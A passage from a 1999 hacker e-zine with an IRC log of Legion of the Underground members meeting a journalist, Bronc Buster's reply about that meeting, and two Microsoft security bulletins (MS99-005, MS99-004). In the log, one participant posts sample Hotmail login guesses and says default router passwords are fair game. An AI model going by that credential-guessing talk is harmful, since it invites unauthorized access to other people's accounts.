  2054.       [04:32] <optiklenz> great, be back then.
  2055.       [04:32] <delam> winn: now now! shh
  2056.       [04:32] <Winn> heh
  2057.       [04:32] <feur> gte, good stock, lol
  2058.       [04:32] <maquis> naughty boy
  2059.       [04:32] <DigiEbola> brb
  2060.       [04:32] <kInGb0nG> brb
  2061.       [04:32] <Winn> brb?
  2062.       [04:32] <maquis> be right back..
  2063.       [04:32] <kInGb0nG> be right back
  2064.       [04:32] <maquis> <d'oh!
  2065.       [04:32] <Winn> slap me! :)
  2066.       [04:32] <maquis> < -- SMACKS WINN
  2067.       [04:32] <maquis> hehehehe
  2068.       [04:33] <Winn> damn that stings
  2069.       [04:33] <maquis> btw, winn,nice article on strikeback this week....nice
  2070.       resaerch...
  2071.       [04:33] <Winn> you should see the hate mail! INcluding the Pentagon!!!
  2072.       [04:33] * delam agrees
  2073.       [04:33] <DigiEbola> back
  2074.       [04:33] *** Joins: hjghjkghk (~jailednot@*!*.co.nz)
  2075.       [04:33] *** Quits: dyslexia (Ping timeout for
  2076.       dyslexia[p34-max2.dun.ihug.co.nz]=0F)
  2077.       [04:33] <maquis> winn - wonder why heheheehehe
  2078.       [04:33] *** hjghjkghk is now known as dyslexia
  2079.       [04:33] <maquis> does Rome Labs ring a bell?  :)
  2080.       [04:33] <optiklenz> ok im back
  2081.       [04:33] <Winn> heh
  2082.       [04:34] <dyslexia> air force base isn't it?
  2083.       [04:34] <Winn> yup
  2084.       [04:35] <feur> optik, what can winn and company disseminate of tonight's
  2085.       chat, you set the rules
  2086.       [04:35] *** Quits: kInGb0nG (Ping timeout for
  2087.       kInGb0nG[dayoh-a242.gemair.com]=0F)
  2088.       [04:36] *** Joins: kInGb0nG (~lil_b0ng@*!*.com)
  2089.       [04:36] <optiklenz> ok
  2090.       [04:36] *** cd is now known as Nikkita
  2091.       [04:36] <optiklenz> just what we've been talking about
  2092.       [04:36] <lothos> as far as I care, you can disseminate any/all of it
  2093.       [04:36] <Winn> OK: I view this as a PR problem with some potential bad
  2094.       downside. Whatever you decide, it really needs to be coherent and absolut=
  2095.       ely
  2096.       unambiguous.
  2097.       [04:36] <optiklenz> people need to know that we are not the bad guys
  2098.       [04:36] <optiklenz> Winn> we can edit some things out
  2099.       [04:36] <feur> optik, can you provide one summary statement on behalf of =
  2100.       the
  2101.       LOU
  2102.       [04:37] <optiklenz> this can be a joint statement from Inforwar, Infosec,
  2103.       and LOU
  2104.       [04:37] <optiklenz> if thats the way you want it
  2105.       [04:37] <Winn> If we take that route, I will edit it, then pass it to yo =
  2106.       for
  2107.       approval.
  2108.       [04:37] <feur> no, what do you want
  2109.       [04:37] <optiklenz> s/inforwar/infowar
  2110.       [04:37] <dyslexia> whatever will require being signed by all memebers etc
  2111.       [04:37] <lothos> sounds good winn
  2112.       [04:38] <maquis> < - signs in spirit
  2113.       [04:38] <optiklenz> =3D]
  2114.       [04:38] <DigiEbola> heh
  2115.       [04:38] <optiklenz> thanks marquis
  2116.       [04:38] <Nikkita> Optik: thnx to so cold 'hackers' talking negatifly in t=
  2117.       he
  2118.       MEDIA about LOU, youre scratched, but If you didn't though an IP of that
  2119.       countries there is nothing to be afraid of
  2120.       [04:38] <optiklenz> we did nothing
  2121.       [04:38] <optiklenz> marquis, and nikkita
  2122.       [04:38] <optiklenz> heh
  2123.       [04:38] <optiklenz> sounds like a match made in heaven
  2124.       [04:39] <Winn> I suggest I send to OPT, let him and I work out the edits
  2125.       then he adds the names he wants to add, and we all distribute tonights
  2126.       conversation PLUS a 1 pafge statement.
  2127.       [04:39] <Nikkita> optik: so there is nothing to afraid of.
  2128.       [04:39] <maquis> mmmm....nikita.....  LOL
  2129.       [04:39] <optiklenz> winn> that works for me
  2130.       [04:39] <Nikkita> maquis: I kill also :P
  2131.       [04:39] <optiklenz> everyone else fine with that?
  2132.       [04:39] <Winn> Send me your contact stuff, and I will get to it AM. You h=
  2133.       ave
  2134.       my voice #. ?
  2135.       [04:39] <maquis> You don't know me, then.  :-)
  2136.       [04:40] <DigiEbola> hm
  2137.       [04:40] <optiklenz> Winn> no
  2138.       [04:40] <maquis> heheeheh
  2139.       [04:40] <Nikkita> optik: Other issue
  2140.       [04:40] <DigiEbola> we should do a teleconference
  2141.       [04:40] <Winn> It would be useful to have some form of ID for the
  2142.       participants, even if it is anonymous. Can you do OPT?
  2143.       [04:40] <optiklenz> can i do what?
  2144.       [04:40] <Nikkita> optik: I red what father said about criminal organisati=
  2145.       ons
  2146.       [04:40] <optiklenz> heh
  2147.       [04:41] <optiklenz> Winn> if you mean card everyone
  2148.       [04:41] <optiklenz> im sure i can work something out
  2149.       [04:41] <Winn> heh... no, I don't want to get things wrong, tho.
  2150.       [04:41] * optiklenz use to be really cool with a few of the local bouncer=
  2151.       s
  2152.       [04:41] <optiklenz> =3D]
  2153.       [04:41] <delam> hahah
  2154.       [04:41] <feur> winn, needs some of identification and authentication, or =
  2155.       he
  2156.       is dead as a journalist
  2157.       [04:41] <Nikkita> optik: but If someone hacks something where goverment h=
  2158.       as
  2159.       a investigestion of spionage activity going on, then they will find
  2160.       you/already found you.
  2161.       [04:42] <optiklenz> Winn> mail me at optik@legions.org
  2162.       [04:42] <optiklenz> and i'll respond
  2163.       [04:42] <optiklenz> if you want you can have my pgp key
  2164.       [04:42] <feur> nikkita, i can assure all associated members of LOU are
  2165.       known, down to their dental records
  2166.       [04:42] <lothos> my email is lothos@trifid.net, pgp key is available from
  2167.       www.rootfest.org
  2168.       [04:42] <maquis> feur - now THAT'S class!
  2169.       [04:42] <Winn> OPT" if we can talk voice, I can tape a statement as well.
  2170.       You can call me if you want. Use PGP, mine is on the PGP server.
  2171.       [04:42] <lothos> down to our dental records???
  2172.       [04:42] <feur> assure that associated intelligence agencies
  2173.       [04:43] <Nikkita> feur: In that case they did something wrong :)
  2174.       [04:43] <DigiEbola> digi@wintermute.unixgeeks.com
  2175.       [04:43] <optiklenz> Winn> heh
  2176.       [04:43] <feur> if you have no teeth, lol
  2177.       [04:43] <Nikkita> Feur: I can assure you that nobody knows about M0f0
  2178.       [04:43] <Nikkita> feur: That's a advice :)
  2179.       [04:43] <optiklenz> i'm not to excited with the idea of having a voice
  2180.       statement passed around and archived
  2181.       [04:44] <DigiEbola> hm
  2182.       [04:44] <DigiEbola> im still hazy about a bunch of fat guys goin thru my
  2183.       records
  2184.       [04:44] <optiklenz> haha
  2185.       [04:44] <feur> nikkita, you misunderstood my statement
  2186.       [04:44] <Winn> Fine. You make the call. No prob!
  2187.      [04:44] <optiklenz> Winn> trust me on this one bro
  2188.       [04:44] <Nikkita> optik: I there tapping you, there's no way to check tha=
  2189.       t.
  2190.       [04:44] <optiklenz> nikk> actually there is
  2191.       [04:45] <optiklenz> and if they've got a dnr on my line i can very well f=
  2192.       ind
  2193.       out too
  2194.       [04:45] <Nikkita> feur: Well I will let my teeths removed tomorrow or so =
  2195.       :)
  2196.       [04:45] <feur> lol
  2197.       [04:45] <delam> heh
  2198.       [04:45] <maquis> I know a good dentist that doesn't ask any questions...r=
  2199.       oad
  2200.       trip to London!  :)
  2201.       [04:45] <maquis> heheehehe
  2202.       [04:45] <Winn> So, tomorrow, we exchange some email... build your story...
  2203.       and we agree not to release until we are all in agreement with it, and yo=
  2204.       u
  2205.       have it 'signed' by your folks.
  2206.       [04:45] <Nikkita> Optik: just trust me on that.
  2207.       [04:46] <optiklenz> Winn> thats the deal
  2208.       [04:46] <Winn> Perfect. Agreed.
  2209.       [04:46] <Nikkita> Maquis: London is just 30 minutes from Amsterdam, pleas=
  2210.       e
  2211.       mail me the adres :)
  2212.       [04:47] <Nikkita> Maquis: Is he expensive :)
  2213.       [04:47] <maquis> HAR! Nikkita, super spy of the 90s should be able to fin=
  2214.       d
  2215.       it.....!
  2216.       [04:48] <Nikkita> maquis: www.dental.record.org ---> www.illegal.dentist.=
  2217.       com
  2218.       [04:48] <delam> heh
  2219.       [04:48] <optiklenz> well folks
  2220.       [04:48] <maquis> yep, that's him... :)
  2221.       [04:48] <Nikkita> maquis: ever seen a blond without theet
  2222.       [04:48] <optiklenz> if thats all i'll be out for the night
  2223.       [04:48] <maquis> < -- heading out in a bit himself.
  2224.       [04:49] <delam> yeah winn you sleeping?
  2225.       [04:49] <DigiEbola> I must concur with my associate
  2226.       [04:49] <optiklenz> we'll keep in touch
  2227.       [04:49] <optiklenz> =3D]
  2228.       [04:49] <maquis> seeya opti
  2229.       [04:49] * Nikkita is going to sleep for 4 ours, because he has a milleniu=
  2230.       m
  2231.       update around 5 ours....
  2232.       [04:49] <DigiEbola> later all
  2233.       [04:49] <maquis> later later and even later!
  2234.       [04:50] <kInGb0nG> later
  2235.       [04:50] <datapleX> so maquis...gonna hook me up wif an internic account? =
  2236.       ;)
  2237.       [04:50] <feur> thank you all for coming on and trusting a bit
  2238.       [04:50] *** Quits: kInGb0nG (the king has left the building=0F)
  2239.       [04:50] *** Quits: DigiEbola (Leaving=0F)
  2240.       [04:50] <maquis> feur: no prob...
  2241.       [04:50] *** Quits: datapleX (later...=0F)
  2242.       [04:50] <Winn> Gentlemen! Thanks ... OPT - not to worry. Tomorrow!
  2243.       [04:50] <delam> nice meeting you guys
  2244.       [04:50] <Nikkita> maquis: and a hit2000.org :)
  2245.       [04:50] <maquis> Later all -- thanks for the invite
  2246.       [04:50] <optiklenz> sure thing
  2247.       [04:50] <maquis> hey, we DO the domain names.... :)
  2248.       [04:50] <delam> check out my cute portrait on the spring issue 1996 of 26=
  2249.       00
  2250.       if you like :)
  2251.       [04:50] *** Quits: optiklenz (eprom=0F)
  2252.       [04:50] *** Parts: Winn (Winn@1*!*.uu.net)
  2253.       [04:51] <Nikkita> maquis: I will mail jou a zone file then :) or give me =
  2254.       the
  2255.       IP of root nameserver :)
  2256.       [04:51] <maquis> heehe...NOT!
  2257.       [04:51] <Nikkita> maquis: ptr would do :)
  2258.       [04:52] <maquis> ptr? as in comPuTeR?
  2259.       [04:52] <Nikkita> ptr record :)
  2260.       [04:52] <delam> char *ptr; ?
  2261.       [04:52] <Nikkita> uh... know linux?
  2262.       [04:52] *** Joins: Father (Agrosso@170.*!*.att.net)
  2263.       [04:52] <maquis> Ahhh...leee-nux....
  2264.       [04:52] * Nikkita tells everyone about DNS howto :)
  2265.       [04:53] <maquis> << - NT (ack!) person
  2266.       [04:53] <feur> ptr as in polish hax0r crew
  2267.       [04:53] <Father> Have I missed anything
  2268.       [04:53] <delam> like jurassic park "Eye Know Yooooooo neeekz"
  2269.       [04:53] <Father> Where is Winn?
  2270.       [04:53] <delam> he left
  2271.       [04:53] <feur> winn, going to sleep
  2272.       [04:54] <Nikkita> Farther: In the Netherlands is privacy exposed trough a
  2273.       software bug not punished,
  2274.       [04:54] <delam> wrapping it up right now father
  2275.       [04:54] <maquis> I'm heading off, all. Thanks for the invites, keep yer
  2276.       heads down, chins up, and....
  2277.       [04:54] <maquis> ...lets be careful out there.
  2278.       [04:54] <Nikkita> If I use an in America located router to connect to a
  2279.       server in The Netherlands, and USE a bug
  2280.       [04:54] <maquis> Night all...rick....
  2281.       [04:54] <Nikkita> could I be convicted in America?
  2282.       [04:54] *** Quits: maquis (Leaving=0F)
  2283.       [04:55] <delam> it's indirect, data still was used from america to perfor=
  2284.       m
  2285.       the action... he mentioned indirect before
  2286.       [04:55] <Father> I'm not clear on the question
  2287.       [04:55] <Nikkita> delam: I'm stationed in the Netherlands.
  2288.       [04:56] <delam> so american property was involved in a crime?
  2289.       [04:56] <Nikkita> Could I be convicted cause I used in USA stationed
  2290.       equipment.
  2291.       [04:56] <Nikkita> delam: nope, just the connection
  2292.       [04:56] <Father> What does "in USA stationed equipment"?
  2293.       [04:56] <Nikkita> it has IP traffic, which I use
  2294.       [04:57] <Nikkita> delam: typing cisco as a password in a Cisco router isn=
  2295.       't
  2296.       hacking...
  2297.       [04:57] <delam> heh, there's alot of definintions to hacking, I agree
  2298.       [04:58] *** Quits: lothos (g'night=0F)
  2299.       [04:58] <dyslexia> heh, it might not be hacking, but it is truly sad how
  2300.       often it works
  2301.       [04:59] <Nikkita> Father: a router is located fysical in USA, I connect t=
  2302.       o
  2303.       that, en then will from ther connect to a server in the Netherlands,
  2304.       [04:59] <delam> that's the state of the world with technology
  2305.       [04:59] <Father> Bottom line: (1) authorized access; (2) on computer
  2306.       connected to Interent; (3) where there is "some" connection to U.S. or
  2307.       Inernational seas, air, shops, or the like, equals prosecutable crime in
  2308.       US., even you and computer(s) never step foot on US soil.  Gabish?  Broad
  2309.       statute.
  2310.       [04:59] <Father> Nikkita:  Yep.  You got warrant.
  2311.       [04:59] <Nikkita> father: but I don't do a crime in the Netherlands..
  2312.       [04:59] <delam> authorized access is the key to this issue.. if authorize=
  2313.       d
  2314.       isn't stated and you guess a password and get in.. have you committed a
  2315.       crime?  I'd say no
  2316.       [05:00] <Nikkita> delam: I say no ...
  2317.       [05:00] <Father> So?  Its not Netherlands statute.  Its US statute.
  2318.       [05:00] <Father> Delam:  Guessing password and using it is unauthorized
  2319.       access.
  2320.       [05:00] <Nikkita> Try this for an example at Hotmail...
  2321.       [05:00] <Nikkita> user: john2
  2322.       [05:00] <Nikkita> pass: john
  2323.       [05:00] <Nikkita> user: hank2
  2324.       [05:00] <Nikkita> pass: hank
  2325.       [05:01] <Father> No thanks.
  2326.       [05:01] <feur> father, what about statute interpreation, that without
  2327.       warning banner, there is no unauthorized entry, all entry is fine
  2328.       [05:01] <Nikkita> just by guessing...
  2329.       [05:01] <delam> the problem with internet protocols are taht certain TCP/=
  2330.       IP
  2331.       ports do not have the ability built into the protocol to post a banner..
  2332.       therefore, the issue of "authorized" can never be established by the pers=
  2333.       on
  2334.       running the computer
  2335.       [05:02] <Father> Feur:  Wrong.  That warning banner issue has to do with
  2336.       whether the US government can monitor you without a warrant.
  2337.       [05:02] <feur> or "rights without remedy"
  2338.       [05:02] <delam> if there is a banner on port 23 taht says "you must work
  2339.       here to enter" and a hacker finds port 21 with no banner and enters, even
  2340.       while guessing a passowrd, have they committed a crime?/ the couldn't see
  2341.       any sign that said "keep out"
  2342.       [05:02] <Nikkita> feur: in Scandinavian countries they MUST have fysical
  2343.       saying that you may not enter whitout authoring.
  2344.       [05:03] <Father> Sign that says keep out is not imortatnt.  Sign that say=
  2345.       s
  2346.       come on in is.
  2347.       [05:03] <Father> sorry
  2348.      
  2349.       [05:03] <Father> (Hey, feds are tough.)_
  2350.       [05:03] <delam> how do you establish "authorized access" when a computer =
  2351.       has
  2352.       been connected to a public network without any signs?? I'd say that impli=
  2353.       es
  2354.       it's meant for the public
  2355.       [05:04] <feur> interesting you say that father, my partner is a crimianl
  2356.       attorney in boston, and is defending an elctronic perimeter intrusion
  2357.       [05:04] <Father> Depends on what the purpose of it being connected is.
  2358.       [05:04] <Nikkita> delam: just like sending mail to another country, that
  2359.       packets will travell along dosen systems without asking for permission
  2360.       [05:04] <delam> you're posed with the problem taht you cannot from the
  2361.       outside determine what it's purpose is, but your intent is to enter
  2362.       [05:05] <Father> Who is your partner?
  2363.       [05:05] <Nikkita> partner?
  2364.       [05:06] <Father> Fleur:  who is your partner?
  2365.       [05:06] <Father> Savage?  Silverglate?
  2366.       [05:06] <feur> check your message window
  2367.       [05:06] <delam> it's an interesting debate that I haven't seen any clear =
  2368.       cut
  2369.       legal answers for
  2370.       [05:07] <Nikkita> btw: does anyone know about research in hacks commited =
  2371.       in
  2372.       USA and outside of the USA
  2373.       [05:08] <feur> nikkita, check nexus
  2374.       [05:08] <Nikkita> I have the feeling that it 's easer to hack in the USA,
  2375.       cause the high penalties companies don't do alot of there securityes
  2376.       [05:08] <Nikkita> www.nexus.com?
  2377.       [05:08] <Nikkita> or lexus nexus
  2378.       [05:09] <feur> the db lex nex
  2379.       [05:09] <Father> Time for me to go. Feel free to contact me, agrosso@xxx.org
  2380.       [05:09] <Nikkita> good morning :)
  2381.       [05:09] <dyslexia> thanks Ftaher
  2382.       [05:09] <Nikkita> feur: nexus is a security audit tool like satan
  2383.       [05:09] <dyslexia> Father
  2384.       [05:10] <feur> no, private db lex
  2385.       [05:10] <Nikkita> feur: I'll check on that, just have to find a working
  2386.       account :)
  2387.       [05:13] <Nikkita> to all LoU members still here, don't let that affaire
  2388.       helding you of.
  2389.       [05:13] <Nikkita> You did fine in the past remember that.
  2390.       [05:13] *** Quits: Father (Ping timeout for
  2391.       Father[170.arlington-04.va.dial-access.att.net]=0F)
  2392.       [05:15] <Nikkita> Mark: If your are in Holland in June come and look us u=
  2393.       p
  2394.       [05:15] <Nikkita> Dutch scene will have a 3 day during party
  2395.       [05:16] <Nikkita> CCC, Rop Gongrijp and maybe some L0pth members
  2396.       [05:16] <Nikkita> will be ther
  2397.       [05:18] <feur> ok ladies and gentlemen the marat sade is over tonight,
  2398.       please come back to the asylum
  2399.       [05:20] <Nikkita> feur: good bye
  2400.       [05:20] <Nikkita> sleep tighyt
  2401.       [05:20] *** Quits: Nikkita (Leaving=0F)
  2402.       [05:22] <feur> goodnight mofo nikkita
  2403.       [05:24] *** Quits: feur (irc, where is the wizard of OZ=0F)
  2404.       [05:25] <delam> I'm going to shut the server down in a couple minutes
  2405.       [05:25] <dyslexia> bye all
  2406.       [05:26] *** Quits: dyslexia (Nuke a gay whale for Jesus!=0F)
  2407.       [05:27] *** Disconnected
  2408.       Session Close: Wed Jan 20 05:27:08 1999
  2409.      
  2410.      <snip>
  2411.      --
  2412.      See Ya!
  2413.      RuffNeck
  2414.      ----   ---   --  -
  2415.      ruffneck@xxxxxx.xxx
  2416.      
  2417.      
  2418.       Prior to posting this here I contacted Bronc Buster and he was kind enough
  2419.      to get back to me with some of the inside story on what happened and why.. 
  2420.      this is his message with only slight modifications:
  2421.       
  2422.      Delivered-To: dok-cruciphux@dok.org
  2423.      Date: Fri, 12 Feb 1999 15:02:34 -0500 (EST)
  2424.      From: Bronc Buster <bronc@xxxxxxx.com>
  2425.      To: cruciphux <cruciphux@dok.org>
  2426.      cc: contact@hackernews.com
  2427.      Subject: Re: irc log
  2428.      In-Reply-To: <19990212152545.SUKT27696.mail.rdc1.on.home.com@azazel.n0where.org>
  2429.      Message-ID: <xxx>
  2430.      MIME-Version: 1.0
  2431.      Content-Type: TEXT/PLAIN; charset=US-ASCII
  2432.      
  2433.      
  2434.      I thank you for contacting someone and telling us about this. I'll tell
  2435.      you what this log is, and what it is about. The l00zerz over at Infowar
  2436.      decided they wanted to try and get a peace of the LoU story, so they
  2437.      offered to organize a 'secret' meeting with 'professionals' in the
  2438.      security and intelligance world to offer us advice after the China hacks
  2439.      because it was confermed that the Chinese Govt sent out a memo to some
  2440.      internal security group and told them to 'actively' look for me and
  2441.      Zyklon.
  2442.      
  2443.      Because Winn knows that I know he is nothing but a fake, he tried to
  2444.      exclude me and Zyklon from the meeting altogeather. As you can see from
  2445.      the logs it worked. Once I had been told by other LoU members about it I
  2446.      contacted Winn and Betty asking what this was all about. They said it was
  2447.      nothing and was not going to happen and to not be concerned. 
  2448.      
  2449.      As you can see they conspired with the rest of LoU to exclude me (maybe
  2450.      Zyklon as well) so that they could have this meeting. What they talked
  2451.      about I had no idea until I saw this log. I was told it never took place.
  2452.      
  2453.      It's funny, me and Zyklon were the people in hot water, and we were the
  2454.      ones not included. It's a case of nothing more then the people at Infowar
  2455.      wanting a peace of a big story and getting their grubby hands into this
  2456.      whole mess.
  2457.      
  2458.      I don't want to say anything negative about LoU, so suffice it to say, I
  2459.      am no longer affiliated with LoU in any way, shape or form. 
  2460.      
  2461.      If you want to print any of this in your news letter, or if HNN wants to
  2462.      print any of this you may, with the exception of anything that I may of
  2463.      let slip out about LoU, or any negative comments against LoU. We parted
  2464.      ways, you guys can see the BS that surrounded it..
  2465.      
  2466.      Again, thanks for contacting me
  2467.      
  2468.      regards,
  2469.       Bronc Buster
  2470.  
  2471.  
  2472.      <snip>
  2473.      
  2474.      'Nuff said on this story I think... thanks to Bronc Buster for clearing 
  2475.      some of this scenario up, and others for advice on 'handling' you know 
  2476.      who you are, also Ruffneck for the log. - Ed
  2477.      
  2478.  
  2479.       @HWA
  2480.       
  2481.   5.0 Microsoft advisories
  2482.       ~~~~~~~~~~~~~~~~~~~~
  2483.       [] Back office server 4.0 
  2484.       
  2485.        Approved-By: secnotif@MICROSOFT.COM
  2486.        Date:         Fri, 12 Feb 1999 12:42:57 -0800
  2487.        Sender: Microsoft Product Security Notification Service <MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM>
  2488.        From: Microsoft Product Security <secnotif@MICROSOFT.COM>
  2489.        Subject:      Microsoft Security Bulletin (MS99-005)
  2490.        To: MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM
  2491.        
  2492.        
  2493.        Microsoft Security Bulletin (MS99-005)
  2494.        --------------------------------------
  2495.        
  2496.       >BackOffice Server 4.0 Does Not Delete Installation Setup File
  2497.        
  2498.        Originally Posted: February 12, 1999
  2499.        
  2500.        Summary
  2501.        =======
  2502.       > Microsoft (R) has learned of a potential vulnerability in the installer for
  2503.       > BackOffice Server (R) 4.0. The installer asks the user to provide the
  2504.       > account userid and password for selected services and writes these to a file
  2505.       > in order to automate the installation process. However, the file is not
  2506.       > deleted when the installation process completes. As detailed below,
  2507.       > Microsoft recommends that BackOffice 4.0 customers delete this file.
  2508.        
  2509.        Microsoft has received no reports of customers being adversely affected by
  2510.        this problem. However, it is releasing this security bulletin in order to
  2511.        proactively provide customers with information about the problem in order to
  2512.        allow them to take steps to ensure their safe computing.
  2513.        
  2514.        Issue
  2515.        =====
  2516.        When a user chooses to install SQL Server (R), Exchange Server (R) or
  2517.        Microsoft Transaction Server (R) as part of a BackOffice 4.0 installation,
  2518.        the BackOffice installer program requests the name and password for the
  2519.        accounts associated with these services. Specifically, it asks for the
  2520.        account name and password for the SQL Executive Logon account, the Exchange
  2521.        Services Account, and the MTS Remote Administration Account. These values
  2522.        are stored in <systemdrive>\Program Files\Microsoft Backoffice\Reboot.ini,
  2523.        and used to install the associated services.
  2524.        
  2525.        BackOffice Server does not erase this file when the installation process is
  2526.        completed. This is true regardless of whether the installation process
  2527.        completes successfully or unsuccessfully. By default, the Microsoft
  2528.        BackOffice folder is not shared, so network access to reboot.ini generally
  2529.        does not pose a risk. Users who can log onto the server locally would be
  2530.        able to access the file, but in most cases this ability is granted only to
  2531.        selected users such as administrators.
  2532.        
  2533.        The fix for this problem is to delete the file <systemdrive>\Program
  2534.        Files\Microsoft Backoffice\Reboot.ini after each BackOffice 4.0
  2535.        installation, whether successful or not. The file is created only by the
  2536.        installer, and, once deleted, will not be re-created unless BackOffice 4.0
  2537.        is re-installed.
  2538.        
  2539.        Affected Software Versions
  2540.        ==========================
  2541.        The following software versions are affected:
  2542.        - Microsoft BackOffice Server 4.0
  2543.        
  2544.        What Microsoft is Doing
  2545.        =======================
  2546.        On February 12th, Microsoft sent this security
  2547.        bulletin to customers subscribing to the Microsoft
  2548.        Product Security Notification Service
  2549.        (see http://www.microsoft.com/security/services/bulletin.asp
  2550.        for more information about this free customer service).
  2551.        
  2552.        Microsoft has published the following Knowledge Base (KB) article on this
  2553.        issue:
  2554.        - Microsoft Knowledge Base (KB) article Q217004,
  2555.           BackOffice Installer Tool Does Not Delete Password Cache File.
  2556.           http://support.microsoft.com/support/kb/articles/q217/0/04.asp
  2557.            (Note: It might take 24 hours from the original posting of this
  2558.           bulletin for the KB article to be visible in the Web-based
  2559.           Knowledge Base.)
  2560.        
  2561.        What customers Should Do
  2562.        ========================
  2563.        Microsoft recommends that customers ensure that they delete the file
  2564.        <systemdrive>\Program Files\Microsoft Backoffice\Reboot.ini after the
  2565.        installation program for BackOffice 4.0 completes
  2566.        
  2567.        More Information
  2568.        ================
  2569.        Please see the following references for more information related to this
  2570.        issue.
  2571.        - Microsoft Security Bulletin MS99-005,
  2572.           BackOffice 4.0 Does Not Delete Installation Setup File
  2573.           (the Web-posted version of this bulletin),
  2574.           http://www.microsoft.com/security/bulletins/ms99-005.asp.
  2575.        - Microsoft Knowledge Base (KB) article Q217004,
  2576.           BackOffice Installer Tool Does Not Delete Password Cache File.
  2577.           http://support.microsoft.com/support/kb/articles/q217/0/04.asp
  2578.           (Note: It might take 24 hours from the original posting of this
  2579.           bulletin for the KB article to be visible in the Web-based
  2580.           Knowledge Base.)
  2581.        
  2582.        Obtaining Support on this Issue
  2583.        ===============================
  2584.        If you require technical assistance with this issue, please contact
  2585.        Microsoft Technical Support. For information on contacting Microsoft
  2586.        Technical Support, please see
  2587.        
  2588. http://support.microsoft.com/support/contact/default.asp.
  2589.        
  2590.        Revisions
  2591.        =========
  2592.        - February 12, 1999: Bulletin Created
  2593.        
  2594.        
  2595.        For additional security-related information about Microsoft products, please
  2596.        visit http://www.microsoft.com/security
  2597.        
  2598.        <snip>
  2599.        
  2600.       Approved-By: secnotif@MICROSOFT.COM
  2601.       X-Mailer: Internet Mail Service (5.5.2524.0)
  2602.       Date:         Mon, 8 Feb 1999 15:06:09 -0800
  2603.       Sender: Microsoft Product Security Notification Service <MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM>
  2604.       From: Microsoft Product Security <secnotif@MICROSOFT.COM>
  2605.       Subject:      Microsoft Security Bulletin (MS99-004)
  2606.       To: MICROSOFT_SECURITY@ANNOUNCE.MICROSOFT.COM
  2607.       
  2608.       
  2609.       Microsoft Security Bulletin (MS99-004)
  2610.       --------------------------------------
  2611.       
  2612.       Patch Available for Authentication Processing Error in Windows NT (r) 4.0
  2613.       Service Pack 4
  2614.       
  2615.       Originally Posted: February 8, 1999
  2616.       
  2617.       Summary
  2618.       =======
  2619.    >  Microsoft has released a patch that eliminates a logic error in Service Pack
  2620.    >  4 for Windows NT 4.0 that could, under certain conditions, allow a user to
  2621.    >  log on interactively and connect to network shares using a blank password.
  2622.    >  The vulnerability primarily, but not exclusively, affects Windows NT servers
  2623.    >  that serve as domain controllers in environments with DOS, Windows 3.1,
  2624.    >  Windows for Workgroups, OS/2 or Macintosh clients. In general, customers who
  2625.    >  have deployed only Windows NT, Windows 95 and Windows 98 client workstations
  2626.    >  are not at risk from this vulnerability.
  2627.       
  2628.       A fully supported patch is available for this vulnerability, and Microsoft
  2629.       recommends that all customers evaluate the risk to their systems and, as
  2630.       appropriate, download and install it on affected computers.
  2631.       
  2632.       Issue
  2633.       =====
  2634.       The Windows NT Security Account Manager (SAM) database stores the hashed
  2635.       password for each user account in two forms: an "NT hash" form that is used
  2636.       to authenticate users on Windows NT clients, and an "LM hash" form that is
  2637.       used to authenticate users on Windows 95, Windows 98, and downlevel clients
  2638.       such as DOS, Windows 3.1, Windows for Workgroups, OS/2 and Macintosh. When a
  2639.       user changes his password via a Windows NT, Windows 95 or Windows 98 client,
  2640.       both the "NT hash" and "LM hash" forms of the password are updated in the
  2641.       SAM. However, when the user changes his password via a downlevel client,
  2642.       only the "LM hash" form of the password is stored; a null value is stored in
  2643.       the "NT hash" field. This is normal operation.
  2644.       
  2645.       When a user attempts an interactive logon or a network share connection from
  2646.       a Windows NT system, the Windows NT authentication process uses the "NT
  2647.       hash" form of the password. If the "NT hash" is null, the "LM hash" of the
  2648.       password is used for verification. (Windows 95, Windows 98 and downlevel
  2649.       clients always use only the "LM hash" for verification.) The logic error in
  2650.       Service Pack 4 incorrectly allows a null "NT hash" value to be used for
  2651.       authentication from Windows NT systems. The result is that if a user
  2652.       account's password was last changed from a DOS, Windows 3.1, Windows for
  2653.       Workgroups, OS/2 or Macintosh client, a user can logon into that account
  2654.       from a Windows NT system using a blank password.
  2655.       
  2656.       By far the most likely machines to be affected by this vulnerability would
  2657.       be domain controllers running Windows NT 4.0 SP 4, in networks that contain
  2658.       any of the downlevel clients listed above. However, any server or
  2659.       workstation running Windows NT 4.0 SP 4 that contains a SAM database with
  2660.       active users who communicate from downlevel clients would be vulnerable to
  2661.       this problem. For example, a workgroup of Windows NT 4.0 SP 4 systems, one
  2662.       of which is accessed by Windows for Workgroups clients, would be affected by
  2663.       
  2664. this vulnerability.
  2665.       
  2666.       It is worth reiterating the following points:
  2667.       - Even on an affected network, a user whose most recent
  2668.          password change was performed via Windows NT, Windows 95
  2669.          or Windows 98 workstations will have a non-null "NT hash"
  2670.          value, and hence will not be at risk.
  2671.       - Customers who are affected by the vulnerability need only
  2672.          apply the patch to machines that contain SAM databases
  2673.          with active user accounts.
  2674.       - There is no need for users to update or change their passwords
  2675.          after applying the patch. Even in vulnerable systems, the SAM
  2676.          database entries are valid; the problem lies in the way SP4
  2677.          processes them. The patch corrects the authentication process
  2678.          logic in SP4 without changing the SAM database entries in any way.
  2679.       
  2680.       Affected Software Versions
  2681.       ==========================
  2682.       The following software versions are affected:
  2683.       - Microsoft Windows NT 4.0, Service Pack 4
  2684.       
  2685.       What Microsoft is Doing
  2686.       =======================
  2687.       On February 8th, Microsoft released a patch that fixes the problem
  2688.       identified above. This patch is available for download from the sites listed
  2689.       below.
  2690.       
  2691.       Microsoft has sent this security bulletin to customers subscribing
  2692.       to the Microsoft Product Security Notification Service (see
  2693.       
  2694. http://www.microsoft.com/security/services/bulletin.asp for more
  2695.       information about this free customer service).
  2696.       
  2697.       Microsoft has published the following Knowledge Base (KB) article on this
  2698.       issue:
  2699.       - Microsoft Knowledge Base (KB) article Q214840,
  2700.          MSV1_0 Incorrectly Allows Network Connections for Specific Accounts
  2701.          http://support.microsoft.com/support/kb/articles/q214/8/40.asp
  2702.          (Note: It might take 24 hours from the original posting of this
  2703.          bulletin for the KB article to be visible in the Web-based
  2704.          Knowledge Base.)
  2705.       
  2706.       Microsoft has posted the following hot fixes to address this problem.
  2707.       Please note that the URLs below have been word-wrapped for readability.
  2708.       - Fix for x86 version:
  2709.          ftp://ftp.microsoft.com/bussys/winnt/winnt-public
